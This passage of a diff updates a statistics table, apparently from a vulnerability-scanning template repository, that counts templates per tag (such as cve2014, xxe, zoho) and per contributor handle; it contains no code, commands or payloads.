iamnoooob | 5 | | | | | | | +| router | 17 | yanyun | 5 | | | | | | | +| auth-bypass | 17 | panch0r3d | 5 | | | | | | | +| springboot | 16 | rootxharsh | 5 | | | | | | | +| cve2014 | 15 | pentest_swissky | 5 | | | | | | | +| debug | 14 | meme-lord | 5 | | | | | | | +| cve2012 | 14 | ganofins | 5 | | | | | | | +| struts | 13 | e_schultze_ | 4 | | | | | | | +| fuzz | 13 | github.com/its0x08 | 4 | | | | | | | +| misconfig | 13 | xelkomy | 4 | | | | | | | +| android | 13 | 
dogasantos | 4 | | | | | | | +| cve2011 | 13 | nodauf | 4 | | | | | | | +| dns | 12 | elsfa7110 | 4 | | | | | | | +| php | 12 | vsh00t | 3 | | | | | | | +| jenkins | 12 | tess | 3 | | | | | | | +| weblogic | 12 | fyoorer | 3 | | | | | | | +| dlink | 12 | shine | 3 | | | | | | | +| adobe | 12 | shifacyclewala | 3 | | | | | | | +| devops | 11 | binaryfigments | 3 | | | | | | | +| zoho | 11 | logicalhunter | 3 | | | | | | | | cve2013 | 11 | incogbyte | 3 | | | | | | | -| zoho | 11 | f1tz | 3 | | | | | | | -| php | 11 | 0w4ys | 3 | | | | | | | -| xxe | 9 | fyoorer | 3 | | | | | | | -| magento | 9 | impramodsargar | 3 | | | | | | | -| ftp | 9 | shifacyclewala | 3 | | | | | | | -| gitlab | 8 | _generic_human_ | 3 | | | | | | | -| aws | 8 | mavericknerd | 3 | | | | | | | -| cnvd | 8 | thomas_from_offensity | 3 | | | | | | | -| scada | 8 | shine | 3 | | | | | | | -| login | 8 | vsh00t | 3 | | | | | | | -| airflow | 8 | tess | 3 | | | | | | | -| rails | 8 | bing0o | 2 | | | | | | | -| ruijie | 8 | parth | 2 | | | | | | | -| vmware | 7 | random-robbie | 2 | | | | | | | -| nginx | 7 | pxmme1337 | 2 | | | | | | | -| backup | 7 | swissky | 2 | | | | | | | -| cve2009 | 7 | mahendra purbia (mah3sec_) | 2 | | | | | | | -| files | 6 | 0xcrypto | 2 | | | | | | | -| google | 6 | 0xrudra | 2 | | | | | | | -| solr | 6 | moritz nentwig | 2 | | | | | | | -| api | 6 | 0xelkomy | 2 | | | | | | | -| laravel | 6 | ehsahil | 2 | | | | | | | -| cve2008 | 6 | koti2 | 2 | | | | | | | -| dell | 6 | gal nagli | 2 | | | | | | | -| coldfusion | 6 | alifathi-h1 | 2 | | | | | | | -| django | 6 | mohammedsaneem | 2 | | | | | | | -| cms | 6 | nkxxkn | 2 | | | | | | | -| netgear | 6 | kiblyn11 | 2 | | | | | | | -| jetty | 6 | udit_thakkur | 2 | | | | | | | -| rconfig | 6 | foulenzer | 2 | | | | | | | -| citrix | 6 | arcc | 2 | | | | | | | -| confluence | 5 | joeldeleep | 2 | | | | | | | -| headless | 5 | 0xprial | 2 | | | | | | | -| circarlife | 5 | bsysop | 2 | | | | | | | -| phpmyadmin | 5 | amsda | 2 
| | | | | | | -| iis | 5 | bp0lr | 2 | | | | | | | -| ssti | 5 | sushantkamble | 2 | | | | | | | -| dedecms | 5 | vavkamil | 2 | | | | | | | +| ftp | 9 | emenalf | 3 | | | | | | | +| xxe | 9 | yash anand @yashanand155 | 3 | | | | | | | +| magento | 9 | dudez | 3 | | | | | | | +| gitlab | 8 | z3bd | 3 | | | | | | | +| ruijie | 8 | mavericknerd | 3 | | | | | | | +| aws | 8 | impramodsargar | 3 | | | | | | | +| login | 8 | 0w4ys | 3 | | | | | | | +| scada | 8 | thomas_from_offensity | 3 | | | | | | | +| airflow | 8 | f1tz | 3 | | | | | | | +| cnvd | 8 | _generic_human_ | 3 | | | | | | | +| rails | 8 | jarijaas | 3 | | | | | | | +| backup | 7 | vavkamil | 2 | | | | | | | +| vmware | 7 | davidmckennirey | 2 | | | | | | | +| nginx | 7 | random-robbie | 2 | | | | | | | +| cms | 7 | foulenzer | 2 | | | | | | | +| cve2009 | 7 | ree4pwn | 2 | | | | | | | +| cve2008 | 6 | mahendra purbia (mah3sec_) | 2 | | | | | | | +| google | 6 | whoever | 2 | | | | | | | +| files | 6 | hetroublemakr | 2 | | | | | | | +| jetty | 6 | unstabl3 | 2 | | | | | | | +| solr | 6 | fabaff | 2 | | | | | | | +| rconfig | 6 | moritz nentwig | 2 | | | | | | | +| api | 6 | hahwul | 2 | | | | | | | +| coldfusion | 6 | x1m_martijn | 2 | | | | | | | +| netgear | 6 | amsda | 2 | | | | | | | +| django | 6 | lotusdll | 2 | | | | | | | +| citrix | 6 | koti2 | 2 | | | | | | | +| laravel | 6 | alifathi-h1 | 2 | | | | | | | +| dell | 6 | mohammedsaneem | 2 | | | | | | | | microsoft | 5 | manas_harsh | 2 | | | | | | | -| fileupload | 5 | 0xsapra | 2 | | | | | | | -| windows | 5 | lu4nx | 2 | | | | | | | -| java | 5 | unstabl3 | 2 | | | | | | | -| drupal | 5 | w4cky_ | 2 | | | | | | | -| ibm | 5 | afaq | 2 | | | | | | | -| lucee | 5 | zomsop82 | 2 | | | | | | | -| wp-theme | 5 | lotusdll | 2 | | | | | | | -| docker | 5 | randomrobbie | 2 | | | | | | | -| vpn | 4 | x1m_martijn | 2 | | | | | | | -| tomcat | 4 | fabaff | 2 | | | | | | | -| moodle | 4 | davidmckennirey | 2 | | | | | | | -| thinkphp | 4 | dheerajmadhukar 
| 2 | | | | | | | -| exchange | 4 | hahwul | 2 | | | | | | | -| solarwinds | 4 | ree4pwn | 2 | | | | | | | -| deserialization | 4 | hetroublemakr | 2 | | | | | | | -| jolokia | 4 | gevakun | 2 | | | | | | | -| zimbra | 4 | ooooooo_q | 1 | | | | | | | -| firmware | 4 | wabafet | 1 | | | | | | | -| samsung | 4 | pratik khalane | 1 | | | | | | | -| artifactory | 4 | yashgoti | 1 | | | | | | | -| traversal | 4 | alex | 1 | | | | | | | -| grafana | 4 | bad5ect0r | 1 | | | | | | | -| nodejs | 4 | regala_ | 1 | | | | | | | -| hongdian | 4 | streetofhackerr007 (rohit | 1 | | | | | | | -| | | soni) | | | | | | | | -| hp | 4 | geraldino2 | 1 | | | | | | | -| elastic | 4 | 52971 | 1 | | | | | | | -| crlf | 4 | alph4byt3 | 1 | | | | | | | -| thinkcmf | 4 | ipanda | 1 | | | | | | | -| webserver | 4 | mhdsamx | 1 | | | | | | | -| asp | 4 | _darrenmartyn | 1 | | | | | | | -| buffalo | 4 | whoever | 1 | | | | | | | -| magmi | 4 | elder tao | 1 | | | | | | | -| itop | 3 | bernardofsr | 1 | | | | | | | -| opensis | 3 | sullo | 1 | | | | | | | -| kubernetes | 3 | deena | 1 | | | | | | | -| httpd | 3 | luskabol | 1 | | | | | | | -| kevinlab | 3 | undefl0w | 1 | | | | | | | -| mongodb | 3 | aresx | 1 | | | | | | | -| tikiwiki | 3 | aaron_costello | 1 | | | | | | | +| printer | 5 | pxmme1337 | 2 | | | | | | | +| fileupload | 5 | joeldeleep | 2 | | | | | | | +| circarlife | 5 | parth | 2 | | | | | | | +| java | 5 | randomrobbie | 2 | | | | | | | +| docker | 5 | dheerajmadhukar | 2 | | | | | | | +| iis | 5 | gal nagli | 2 | | | | | | | +| confluence | 5 | swissky | 2 | | | | | | | +| ssti | 5 | 0xprial | 2 | | | | | | | +| headless | 5 | sushantkamble | 2 | | | | | | | +| drupal | 5 | nkxxkn | 2 | | | | | | | +| wp-theme | 5 | w4cky_ | 2 | | | | | | | +| windows | 5 | 0xelkomy | 2 | | | | | | | +| lucee | 5 | afaq | 2 | | | | | | | +| ibm | 5 | kiblyn11 | 2 | | | | | | | +| phpmyadmin | 5 | bsysop | 2 | | | | | | | +| dedecms | 5 | zomsop82 | 2 | | | | | | | +| exchange | 4 | bp0lr | 2 | 
| | | | | | +| artifactory | 4 | 0xcrypto | 2 | | | | | | | +| zimbra | 4 | 0xsapra | 2 | | | | | | | +| crlf | 4 | bing0o | 2 | | | | | | | +| webserver | 4 | ehsahil | 2 | | | | | | | +| thinkcmf | 4 | udit_thakkur | 2 | | | | | | | +| moodle | 4 | arcc | 2 | | | | | | | +| deserialization | 4 | 0xrudra | 2 | | | | | | | +| hongdian | 4 | gevakun | 2 | | | | | | | +| solarwinds | 4 | lu4nx | 2 | | | | | | | +| glpi | 4 | cookiehanhoan | 1 | | | | | | | +| grafana | 4 | jteles | 1 | | | | | | | +| firmware | 4 | th3.d1p4k | 1 | | | | | | | +| thinkphp | 4 | exploitation | 1 | | | | | | | +| hp | 4 | fmunozs | 1 | | | | | | | +| magmi | 4 | yashanand155 | 1 | | | | | | | +| vpn | 4 | _harleo | 1 | | | | | | | +| tomcat | 4 | r3naissance | 1 | | | | | | | +| traversal | 4 | idealphase | 1 | | | | | | | +| samsung | 4 | luskabol | 1 | | | | | | | +| asp | 4 | sy3omda | 1 | | | | | | | +| buffalo | 4 | adrianmf | 1 | | | | | | | +| jolokia | 4 | sshell | 1 | | | | | | | +| nodejs | 4 | elmahdi | 1 | | | | | | | +| elastic | 4 | becivells | 1 | | | | | | | +| targa | 3 | borna nematzadeh | 1 | | | | | | | +| resin | 3 | notsoevilweasel | 1 | | | | | | | +| symfony | 3 | bad5ect0r | 1 | | | | | | | +| opensis | 3 | pdp | 1 | | | | | | | +| kafka | 3 | ipanda | 1 | | | | | | | +| microstrategy | 3 | willd96 | 1 | | | | | | | +| terramaster | 3 | wabafet | 1 | | | | | | | +| fpd | 3 | ohlinge | 1 | | | | | | | +| nexus | 3 | qlkwej | 1 | | | | | | | +| httpd | 3 | bolli95 | 1 | | | | | | | +| ebs | 3 | g4l1t0 | 1 | | | | | | | +| tikiwiki | 3 | sickwell | 1 | | | | | | | +| zabbix | 3 | schniggie | 1 | | | | | | | +| bitrix | 3 | manikanta a.k.a @secureitmania | 1 | | | | | | | +| kubernetes | 3 | me9187 | 1 | | | | | | | +| vbulletin | 3 | alph4byt3 | 1 | | | | | | | +| backups | 3 | mubassirpatel | 1 | | | | | | | +| intrusive | 3 | manuelbua | 1 | | | | | | | +| bypass | 3 | tirtha_mandal | 1 | | | | | | | +| ofbiz | 3 | convisoappsec | 1 | | | | | | | +| openssh | 3 | 
ooooooo_q | 1 | | | | | | | +| kevinlab | 3 | juicypotato1 | 1 | | | | | | | +| git | 3 | johnjhacking | 1 | | | | | | | +| ssh | 3 | ahmed sherif | 1 | | | | | | | +| nacos | 3 | johnk3r | 1 | | | | | | | +| slack | 3 | 52971 | 1 | | | | | | | +| nosqli | 3 | petruknisme | 1 | | | | | | | +| mongodb | 3 | sid ahmed malaoui @ realistic | 1 | | | | | | | +| | | security | | | | | | | | +| zhiyuan | 3 | zhenwarx | 1 | | | | | | | +| springcloud | 3 | mah3sec_ | 1 | | | | | | | +| lfr | 3 | rojanrijal | 1 | | | | | | | +| r-seenet | 3 | b0yd | 1 | | | | | | | +| fanruan | 3 | revblock | 1 | | | | | | | +| caucho | 3 | pratik khalane | 1 | | | | | | | +| amazon | 3 | _c0wb0y_ | 1 | | | | | | | +| log | 3 | kishore krishna (sillydaddy) | 1 | | | | | | | +| wso2 | 3 | s1r1u5_ | 1 | | | | | | | +| oa | 3 | j33n1k4 | 1 | | | | | | | +| itop | 3 | knassar702 | 1 | | | | | | | +| seeyon | 2 | ivo palazzolo (@palaziv) | 1 | | | | | | | +| shellshock | 2 | vzamanillo | 1 | | | | | | | +| geowebserver | 2 | its0x08 | 1 | | | | | | | +| prestashop | 2 | intx0x80 | 1 | | | | | | | +| webcam | 2 | mesaglio | 1 | | | | | | | +| backdoor | 2 | kba@sogeti_esec | 1 | | | | | | | +| paloalto | 2 | 0ut0fb4nd | 1 | | | | | | | +| waf | 2 | fopina | 1 | | | | | | | +| netis | 2 | 0xtavian | 1 | | | | | | | +| hpe | 2 | alex | 1 | | | | | | | +| avantfax | 2 | _darrenmartyn | 1 | | | | | | | +| kibana | 2 | raesene | 1 | | | | | | | +| idrac | 2 | g4l1t0 and @convisoappsec | 1 | | | | | | | +| saltstack | 2 | pudsec | 1 | | | | | | | +| cve2007 | 2 | infosecsanyam | 1 | | | | | | | +| icewarp | 2 | absshax | 1 | | | | | | | +| igs | 2 | rodnt | 1 | | | | | | | +| service | 2 | makyotox | 1 | | | | | | | +| rstudio | 2 | nytr0gen | 1 | | | | | | | +| splunk | 2 | geraldino2 | 1 | | | | | | | +| natshell | 2 | rtcms | 1 | | | | | | | +| proxy | 2 | jeya seelan | 1 | | | | | | | +| huawei | 2 | elder tao | 1 | | | | | | | +| activemq | 2 | remonsec | 1 | | | | | | | +| glassfish | 2 | 
kabirsuda | 1 | | | | | | | +| emerge | 2 | thezakman | 1 | | | | | | | +| openam | 2 | retr0 | 1 | | | | | | | +| jsf | 2 | kurohost | 1 | | | | | | | +| rockmongo | 2 | whynotke | 1 | | | | | | | +| hasura | 2 | udyz | 1 | | | | | | | +| wordfence | 2 | undefl0w | 1 | | | | | | | +| ucmdb | 2 | ajaysenr | 1 | | | | | | | +| ecology | 2 | tim_koopmans | 1 | | | | | | | +| guacamole | 2 | andirrahmani1 | 1 | | | | | | | +| azure | 2 | affix | 1 | | | | | | | +| status | 2 | kareemse1im | 1 | | | | | | | +| telerik | 2 | aaron_costello | 1 | | | | | | | | | | (@conspiracyproof) | | | | | | | | -| bitrix | 3 | zandros0 | 1 | | | | | | | -| openssh | 3 | jeya seelan | 1 | | | | | | | -| lfr | 3 | j3ssie/geraldino2 | 1 | | | | | | | -| slack | 3 | nytr0gen | 1 | | | | | | | -| vbulletin | 3 | schniggie | 1 | | | | | | | -| bypass | 3 | elmahdi | 1 | | | | | | | -| backups | 3 | retr0 | 1 | | | | | | | -| oa | 3 | kareemse1im | 1 | | | | | | | -| caucho | 3 | sickwell | 1 | | | | | | | -| ebs | 3 | furkansenan | 1 | | | | | | | -| log | 3 | rojanrijal | 1 | | | | | | | -| springcloud | 3 | @dwisiswant0 | 1 | | | | | | | -| kafka | 3 | hakluke | 1 | | | | | | | -| ofbiz | 3 | d0rkerdevil | 1 | | | | | | | -| wso2 | 3 | knassar702 | 1 | | | | | | | -| amazon | 3 | noamrathaus | 1 | | | | | | | -| ssh | 3 | johnk3r | 1 | | | | | | | -| nacos | 3 | kurohost | 1 | | | | | | | -| intrusive | 3 | r3naissance | 1 | | | | | | | -| targa | 3 | udyz | 1 | | | | | | | -| zhiyuan | 3 | mubassirpatel | 1 | | | | | | | -| r-seenet | 3 | luci | 1 | | | | | | | -| microstrategy | 3 | notsoevilweasel | 1 | | | | | | | -| git | 3 | taielab | 1 | | | | | | | -| fpd | 3 | tirtha_mandal | 1 | | | | | | | -| printer | 3 | sy3omda | 1 | | | | | | | -| resin | 3 | evolutionsec | 1 | | | | | | | -| nosqli | 3 | un-fmunozs | 1 | | | | | | | -| zabbix | 3 | mass0ma | 1 | | | | | | | -| nexus | 3 | dogasantos | 1 | | | | | | | -| symfony | 3 | sicksec | 1 | | | | | | | -| fanruan | 3 | juicypotato1 
| 1 | | | | | | | -| terramaster | 3 | manuelbua | 1 | | | | | | | -| jellyfin | 2 | absshax | 1 | | | | | | | -| hjtcloud | 2 | ratnadip gajbhiye | 1 | | | | | | | -| cache | 2 | hanlaomo | 1 | | | | | | | -| openam | 2 | vzamanillo | 1 | | | | | | | -| dolibarr | 2 | 0xteles | 1 | | | | | | | -| pega | 2 | huowuzhao | 1 | | | | | | | -| xxljob | 2 | its0x08 | 1 | | | | | | | -| rockmongo | 2 | shreyapohekar | 1 | | | | | | | -| jboss | 2 | fmunozs | 1 | | | | | | | -| idrac | 2 | micha3lb3n | 1 | | | | | | | -| chiyu | 2 | b0yd | 1 | | | | | | | -| ecology | 2 | bolli95 | 1 | | | | | | | -| globalprotect | 2 | willd96 | 1 | | | | | | | -| oauth | 2 | remonsec | 1 | | | | | | | -| maian | 2 | revblock | 1 | | | | | | | -| fortios | 2 | daviey | 1 | | | | | | | -| trixbox | 2 | kba@sogeti_esec | 1 | | | | | | | -| igs | 2 | ringo | 1 | | | | | | | -| telerik | 2 | soyelmago | 1 | | | | | | | -| backdoor | 2 | defr0ggy | 1 | | | | | | | -| cve2007 | 2 | yashanand155 | 1 | | | | | | | -| saltstack | 2 | c3l3si4n | 1 | | | | | | | -| hasura | 2 | co0nan | 1 | | | | | | | -| injection | 2 | g4l1t0 and @convisoappsec | 1 | | | | | | | -| shellshock | 2 | @github.com/defr0ggy | 1 | | | | | | | -| smb | 2 | sec_hawk | 1 | | | | | | | -| kentico | 2 | rtcms | 1 | | | | | | | -| phpcollab | 2 | kishore krishna (sillydaddy) | 1 | | | | | | | -| avantfax | 2 | cookiehanhoan | 1 | | | | | | | -| prometheus | 2 | zhenwarx | 1 | | | | | | | -| strapi | 2 | patralos | 1 | | | | | | | -| voipmonitor | 2 | fopina | 1 | | | | | | | -| jeedom | 2 | b4uh0lz | 1 | | | | | | | -| rockethchat | 2 | thevillagehacker | 1 | | | | | | | -| nextjs | 2 | affix | 1 | | | | | | | -| nagios | 2 | 0xtavian | 1 | | | | | | | -| akkadian | 2 | apt-mirror | 1 | | | | | | | -| showdoc | 2 | s1r1u5_ | 1 | | | | | | | -| plesk | 2 | akash.c | 1 | | | | | | | -| linkerd | 2 | whynotke | 1 | | | | | | | -| dos | 2 | gboddin | 1 | | | | | | | -| keycloak | 2 | rodnt | 1 | | | | | | | -| icewarp | 2 | borna 
nematzadeh | 1 | | | | | | | -| grav | 2 | dawid czarnecki | 1 | | | | | | | -| spark | 2 | johnjhacking | 1 | | | | | | | -| yapi | 2 | manikanta a.k.a @secureitmania | 1 | | | | | | | -| geowebserver | 2 | aceseven (digisec360) | 1 | | | | | | | -| activemq | 2 | blckraven | 1 | | | | | | | -| mida | 2 | naglinagli | 1 | | | | | | | -| guacamole | 2 | qlkwej | 1 | | | | | | | -| odoo | 2 | _harleo | 1 | | | | | | | -| akamai | 2 | pudsec | 1 | | | | | | | -| bigip | 2 | alperenkesk | 1 | | | | | | | -| natshell | 2 | 0h1in9e | 1 | | | | | | | -| seeyon | 2 | j33n1k4 | 1 | | | | | | | -| smtp | 2 | shelld3v | 1 | | | | | | | -| ucmdb | 2 | streetofhackerr007 | 1 | | | | | | | -| glassfish | 2 | ajaysenr | 1 | | | | | | | -| frp | 2 | berkdusunur | 1 | | | | | | | -| openfire | 2 | shifacyclewla | 1 | | | | | | | -| github | 2 | thezakman | 1 | | | | | | | -| waf | 2 | sshell | 1 | | | | | | | -| emerge | 2 | th3.d1p4k | 1 | | | | | | | -| azure | 2 | andysvints | 1 | | | | | | | -| jsf | 2 | ohlinge | 1 | | | | | | | -| status | 2 | infosecsanyam | 1 | | | | | | | -| rstudio | 2 | tim_koopmans | 1 | | | | | | | -| huawei | 2 | kabirsuda | 1 | | | | | | | -| service | 2 | bernardo rodrigues | 1 | | | | | | | +| oauth | 2 | shifacyclewla | 1 | | | | | | | +| prometheus | 2 | yavolo | 1 | | | | | | | +| nagios | 2 | mass0ma | 1 | | | | | | | +| mail | 2 | defr0ggy | 1 | | | | | | | +| github | 2 | @dwisiswant0 | 1 | | | | | | | +| jboss | 2 | thevillagehacker | 1 | | | | | | | +| frp | 2 | b4uh0lz | 1 | | | | | | | +| hoteldruid | 2 | aresx | 1 | | | | | | | +| sonicwall | 2 | hakluke | 1 | | | | | | | +| jellyfin | 2 | daviey | 1 | | | | | | | +| sonarqube | 2 | regala_ | 1 | | | | | | | +| injection | 2 | bernardo rodrigues | 1 | | | | | | | | | | @bernardofsr | andré monteiro | | | | | | | | | | | @am0nt31r0 | | | | | | | | -| sonicwall | 2 | me9187 | 1 | | | | | | | -| paloalto | 2 | andirrahmani1 | 1 | | | | | | | -| wordfence | 2 | petruknisme | 1 | | | | | | | 
-| flir | 2 | smaranchand | 1 | | | | | | | -| horde | 2 | yavolo | 1 | | | | | | | -| mcafee | 2 | intx0x80 | 1 | | | | | | | -| netis | 2 | ivo palazzolo (@palaziv) | 1 | | | | | | | -| sonarqube | 2 | adrianmf | 1 | | | | | | | -| firebase | 2 | sid ahmed malaoui @ realistic | 1 | | | | | | | -| | | security | | | | | | | | -| proxy | 2 | exploitation | 1 | | | | | | | -| hashicorp | 2 | makyotox | 1 | | | | | | | -| mail | 2 | 0xrod | 1 | | | | | | | -| vrealize | 2 | akshansh | 1 | | | | | | | -| couchdb | 2 | philippdelteil | 1 | | | | | | | -| webcam | 2 | divya_mudgal | 1 | | | | | | | -| cve2005 | 2 | bjhulst | 1 | | | | | | | -| chamilo | 2 | jteles | 1 | | | | | | | -| kibana | 2 | ilovebinbash | 1 | | | | | | | -| hpe | 2 | 0ut0fb4nd | 1 | | | | | | | -| leak | 2 | flag007 | 1 | | | | | | | -| splunk | 2 | mesaglio | 1 | | | | | | | -| sharepoint | 2 | chron0x | 1 | | | | | | | -| lutron | 1 | idealphase | 1 | | | | | | | -| huijietong | 1 | iampritam | 1 | | | | | | | -| sidekiq | 1 | raesene | 1 | | | | | | | -| beanshell | 1 | becivells | 1 | | | | | | | -| st | 1 | ahmed sherif | 1 | | | | | | | -| payara | 1 | abison_binoy | 1 | | | | | | | -| spring | 1 | _c0wb0y_ | 1 | | | | | | | -| openemr | 1 | omarkurt | 1 | | | | | | | -| scs | 1 | toufik airane | 1 | | | | | | | -| salesforce | 1 | pdp | 1 | | | | | | | -| razor | 1 | mah3sec_ | 1 | | | | | | | -| mailchimp | 1 | ldionmarcil | 1 | | | | | | | -| ssltls | 1 | | | | | | | | | -| alibaba | 1 | | | | | | | | | -| sureline | 1 | | | | | | | | | -| cve2006 | 1 | | | | | | | | | -| axis | 1 | | | | | | | | | +| rockethchat | 2 | akash.c | 1 | | | | | | | +| smtp | 2 | @github.com/defr0ggy | 1 | | | | | | | +| horde | 2 | co0nan | 1 | | | | | | | +| trixbox | 2 | aceseven (digisec360) | 1 | | | | | | | +| sharepoint | 2 | flag007 | 1 | | | | | | | +| voipmonitor | 2 | evolutionsec | 1 | | | | | | | +| odoo | 2 | smaranchand | 1 | | | | | | | +| chiyu | 2 | furkansenan | 1 | | | | | | | +| mcafee | 
2 | yashgoti | 1 | | | | | | | +| leak | 2 | apt-mirror | 1 | | | | | | | +| jeedom | 2 | divya_mudgal | 1 | | | | | | | +| plesk | 2 | sec_hawk | 1 | | | | | | | +| hjtcloud | 2 | philippdelteil | 1 | | | | | | | +| hashicorp | 2 | hanlaomo | 1 | | | | | | | +| showdoc | 2 | chron0x | 1 | | | | | | | +| openfire | 2 | bjhulst | 1 | | | | | | | +| yapi | 2 | 0xrod | 1 | | | | | | | +| akamai | 2 | noamrathaus | 1 | | | | | | | +| cache | 2 | d0rkerdevil | 1 | | | | | | | +| strapi | 2 | c3l3si4n | 1 | | | | | | | +| linkerd | 2 | deena | 1 | | | | | | | +| keycloak | 2 | soyelmago | 1 | | | | | | | +| cve2005 | 2 | patralos | 1 | | | | | | | +| kentico | 2 | dawid czarnecki | 1 | | | | | | | +| dolibarr | 2 | sicksec | 1 | | | | | | | +| xxljob | 2 | streetofhackerr007 (rohit | 1 | | | | | | | +| | | soni) | | | | | | | | +| akkadian | 2 | gboddin | 1 | | | | | | | +| mida | 2 | bernardofsr | 1 | | | | | | | +| spark | 2 | micha3lb3n | 1 | | | | | | | +| pega | 2 | berkdusunur | 1 | | | | | | | +| dos | 2 | iampritam | 1 | | | | | | | +| firebase | 2 | toufik airane | 1 | | | | | | | +| chamilo | 2 | omarkurt | 1 | | | | | | | +| fortios | 2 | ringo | 1 | | | | | | | +| globalprotect | 2 | luci | 1 | | | | | | | +| flir | 2 | streetofhackerr007 | 1 | | | | | | | +| smb | 2 | zandros0 | 1 | | | | | | | +| bigip | 2 | sullo | 1 | | | | | | | +| phpcollab | 2 | taielab | 1 | | | | | | | +| maian | 2 | 0xteles | 1 | | | | | | | +| nextjs | 2 | abison_binoy | 1 | | | | | | | +| grav | 2 | j3ssie/geraldino2 | 1 | | | | | | | +| couchdb | 2 | 0h1in9e | 1 | | | | | | | +| vrealize | 2 | un-fmunozs | 1 | | | | | | | +| monitorr | 1 | huowuzhao | 1 | | | | | | | +| vscode | 1 | alperenkesk | 1 | | | | | | | +| exacqvision | 1 | naglinagli | 1 | | | | | | | +| cse | 1 | akshansh | 1 | | | | | | | +| traefik | 1 | shelld3v | 1 | | | | | | | +| npm | 1 | shreyapohekar | 1 | | | | | | | +| geutebruck | 1 | ldionmarcil | 1 | | | | | | | +| st | 1 | mhdsamx | 1 | | | | | | | +| 
viewpoint | 1 | ratnadip gajbhiye | 1 | | | | | | | +| livezilla | 1 | blckraven | 1 | | | | | | | +| zookeeper | 1 | ilovebinbash | 1 | | | | | | | +| blackboard | 1 | andysvints | 1 | | | | | | | +| proftpd | 1 | | | | | | | | | | redcap | 1 | | | | | | | | | -| iceflow | 1 | | | | | | | | | -| eyelock | 1 | | | | | | | | | -| arl | 1 | | | | | | | | | -| netrc | 1 | | | | | | | | | -| doh | 1 | | | | | | | | | -| tjws | 1 | | | | | | | | | -| spip | 1 | | | | | | | | | -| appweb | 1 | | | | | | | | | -| linux | 1 | | | | | | | | | -| codeigniter | 1 | | | | | | | | | -| rdp | 1 | | | | | | | | | -| mirai | 1 | | | | | | | | | -| expn | 1 | | | | | | | | | -| pyramid | 1 | | | | | | | | | -| plc | 1 | | | | | | | | | -| subrion | 1 | | | | | | | | | -| bruteforce | 1 | | | | | | | | | -| fortilogger | 1 | | | | | | | | | -| azkaban | 1 | | | | | | | | | -| webmodule-ee | 1 | | | | | | | | | -| concrete | 1 | | | | | | | | | -| ganglia | 1 | | | | | | | | | -| aura | 1 | | | | | | | | | -| smartsense | 1 | | | | | | | | | -| javascript | 1 | | | | | | | | | -| dotclear | 1 | | | | | | | | | -| exacqvision | 1 | | | | | | | | | -| jmx | 1 | | | | | | | | | -| ricoh | 1 | | | | | | | | | -| webftp | 1 | | | | | | | | | -| spf | 1 | | | | | | | | | -| cloudflare | 1 | | | | | | | | | -| vscode | 1 | | | | | | | | | -| acme | 1 | | | | | | | | | -| timesheet | 1 | | | | | | | | | -| phalcon | 1 | | | | | | | | | -| achecker | 1 | | | | | | | | | -| zzzcms | 1 | | | | | | | | | -| twitter-server | 1 | | | | | | | | | -| sage | 1 | | | | | | | | | -| visualtools | 1 | | | | | | | | | -| mongo | 1 | | | | | | | | | -| wuzhicms | 1 | | | | | | | | | -| jenzabar | 1 | | | | | | | | | -| eprints | 1 | | | | | | | | | -| aspnuke | 1 | | | | | | | | | -| kerbynet | 1 | | | | | | | | | -| rabbitmq | 1 | | | | | | | | | -| monitorix | 1 | | | | | | | | | -| cerebro | 1 | | | | | | | | | -| npm | 1 | | | | | | | | | -| zarafa | 1 | | | | | | | | | -| socomec | 1 | | | | | | | | 
| -| etouch | 1 | | | | | | | | | -| bash | 1 | | | | | | | | | -| default-login | 1 | | | | | | | | | -| webmin | 1 | | | | | | | | | -| bedita | 1 | | | | | | | | | -| checkpoint | 1 | | | | | | | | | -| gloo | 1 | | | | | | | | | -| redhat | 1 | | | | | | | | | -| adminer | 1 | | | | | | | | | -| szhe | 1 | | | | | | | | | -| diris | 1 | | | | | | | | | -| mara | 1 | | | | | | | | | -| kong | 1 | | | | | | | | | -| hadoop | 1 | | | | | | | | | -| magicflow | 1 | | | | | | | | | -| soar | 1 | | | | | | | | | -| alerta | 1 | | | | | | | | | -| ghost | 1 | | | | | | | | | -| codemeter | 1 | | | | | | | | | -| rmc | 1 | | | | | | | | | -| cherokee | 1 | | | | | | | | | -| sangfor | 1 | | | | | | | | | -| mautic | 1 | | | | | | | | | -| panabit | 1 | | | | | | | | | -| dotnetnuke | 1 | | | | | | | | | -| auth | 1 | | | | | | | | | -| camunda | 1 | | | | | | | | | -| landray | 1 | | | | | | | | | -| rmi | 1 | | | | | | | | | -| xdcms | 1 | | | | | | | | | -| maccmsv10 | 1 | | | | | | | | | -| panos | 1 | | | | | | | | | -| owasp | 1 | | | | | | | | | -| upload | 1 | | | | | | | | | -| triconsole | 1 | | | | | | | | | -| wamp | 1 | | | | | | | | | -| javafaces | 1 | | | | | | | | | -| zend | 1 | | | | | | | | | +| mdb | 1 | | | | | | | | | +| fortiweb | 1 | | | | | | | | | +| phpunit | 1 | | | | | | | | | | wazuh | 1 | | | | | | | | | -| chinaunicom | 1 | | | | | | | | | -| gateone | 1 | | | | | | | | | -| visionhub | 1 | | | | | | | | | -| floc | 1 | | | | | | | | | -| memcached | 1 | | | | | | | | | -| duomicms | 1 | | | | | | | | | -| livezilla | 1 | | | | | | | | | -| webui | 1 | | | | | | | | | -| announcekit | 1 | | | | | | | | | -| wifisky | 1 | | | | | | | | | -| node | 1 | | | | | | | | | -| solman | 1 | | | | | | | | | -| getsimple | 1 | | | | | | | | | -| exponentcms | 1 | | | | | | | | | -| setup | 1 | | | | | | | | | -| netsweeper | 1 | | | | | | | | | -| svn | 1 | | | | | | | | | -| clink-office | 1 | | | | | | | | | -| qsan | 1 | | | | | | | | | -| 
wildfly | 1 | | | | | | | | | -| yii | 1 | | | | | | | | | -| viewpoint | 1 | | | | | | | | | -| redis | 1 | | | | | | | | | -| email | 1 | | | | | | | | | -| bazarr | 1 | | | | | | | | | -| ruby | 1 | | | | | | | | | -| ioncube | 1 | | | | | | | | | -| realteo | 1 | | | | | | | | | -| blind | 1 | | | | | | | | | -| powercreator | 1 | | | | | | | | | -| plone | 1 | | | | | | | | | -| resourcespace | 1 | | | | | | | | | -| tenda | 1 | | | | | | | | | -| lancom | 1 | | | | | | | | | -| rhymix | 1 | | | | | | | | | -| upnp | 1 | | | | | | | | | -| calendarix | 1 | | | | | | | | | -| sceditor | 1 | | | | | | | | | -| zm | 1 | | | | | | | | | +| ganglia | 1 | | | | | | | | | +| javafaces | 1 | | | | | | | | | +| saltapi | 1 | | | | | | | | | +| beanshell | 1 | | | | | | | | | +| huijietong | 1 | | | | | | | | | +| interlib | 1 | | | | | | | | | +| payara | 1 